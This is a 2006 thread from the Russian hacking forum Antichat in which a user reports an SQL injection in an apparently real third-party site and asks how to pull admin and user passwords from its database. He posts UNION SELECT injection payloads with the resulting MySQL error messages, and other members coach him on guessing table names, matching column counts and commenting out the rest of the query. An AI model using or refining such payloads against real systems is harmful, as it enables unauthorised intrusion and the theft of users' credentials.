ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

И снова sql иньекция
  #1  
Старый 09.03.2006, 14:16
Аватар для Spaiojek
Spaiojek
Новичок
Регистрация: 09.03.2006
Сообщений: 3
Провел на форуме:
7348

Репутация: 0
По умолчанию И снова sql иньекция

Нашол вот такую афигительную sql иньекцию:

Код:
[SELECT failed in SQL: SELECT id, parentid, name FROM membership_categories WHERE id = 2 union select null,null,null from admin] ( 1146 : Table 'igor987_studio.admin' doesn't exist )
Немогу таблицу с админкой прошупать, уже вариантов 20 попробывал, админка там точно есть с юзерами, у кого какие вварианты есть?
 
Ответить с цитированием

  #2  
Старый 09.03.2006, 14:34
Аватар для ZaCo
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226

Репутация: 1332


По умолчанию

видишь префикс membership_ ? ну попробуй с ним че нить намутить. таблица admin - на самом деле маловероятно... попробуй просто user,users (с префиксом).
 
Ответить с цитированием

  #3  
Старый 09.03.2006, 14:39
Аватар для Dronga
Dronga
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464

Репутация: 714


Отправить сообщение для Dronga с помощью ICQ
По умолчанию

admin_users встречал
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
 
Ответить с цитированием

  #4  
Старый 09.03.2006, 14:53
Аватар для Spaiojek
Spaiojek
Новичок
Регистрация: 09.03.2006
Сообщений: 3
Провел на форуме:
7348

Репутация: 0
По умолчанию

Блин нашол вот такая фигня вылазит
Код:
[SELECT failed in SQL: SELECT COUNT(*) FROM membership_categories WHERE parentid=2 union select null,null,password from membership_users AND enabled=1] ( 1064 : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND enabled=1' at line 1 )
А после того как экранирую, такая
[SELECT failed in SQL: SELECT id, parentid, name FROM membership_categories WHERE id = 2 union select null,null,password from membership_users*/] ( 1064 : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '*/' at line 1 )
 
Ответить с цитированием

  #5  
Старый 09.03.2006, 15:22
Аватар для ZaCo
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226

Репутация: 1332


По умолчанию

бля нахуя тебе тут что-то эранировать тем более неправильно?
1)у тебя кол-во столбцов из второго слеекта должно быть равно кол-ву столбцов из первого, то есть один
2)твои коментарии должны выглядить так
Код:
/*КАМЕНТЫ*/
или
Код:
/*КАМЕНТЫ
с дальнейшими вопрjсами на mysql.ru
 
Ответить с цитированием

  #6  
Старый 09.03.2006, 17:18
Аватар для Spaiojek
Spaiojek
Новичок
Регистрация: 09.03.2006
Сообщений: 3
Провел на форуме:
7348

Репутация: 0
По умолчанию

Код:
[SELECT failed in SQL: SELECT id, parentid, name FROM membership_categories WHERE id = 2 union select 0 from membership_users/*] ( 1222 : The used SELECT statements have a different number of columns )
Блин вставляю одно поле, он показывает что с базы выгрибает три, ставлю три поля показывает, как я рание писал, что за фигня? подскажитес....
 
Ответить с цитированием

  #7  
Старый 09.03.2006, 19:49
Аватар для Mobile
Mobile
Регистрация: 18.02.2006
Сообщений: 1,090
Провел на форуме:
6489333

Репутация: 1564


Отправить сообщение для Mobile с помощью ICQ
По умолчанию

Цитата:
Сообщение от Spaiojek  
Код:
[SELECT failed in SQL: SELECT id, parentid, name FROM membership_categories WHERE id = 2 union select 0 from membership_users/*] ( 1222 : The used SELECT statements have a different number of columns )
Блин вставляю одно поле, он показывает что с базы выгрибает три, ставлю три поля показывает, как я рание писал, что за фигня? подскажитес....
Напиши Задохлику в асю, он в этом хорошо шарит...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ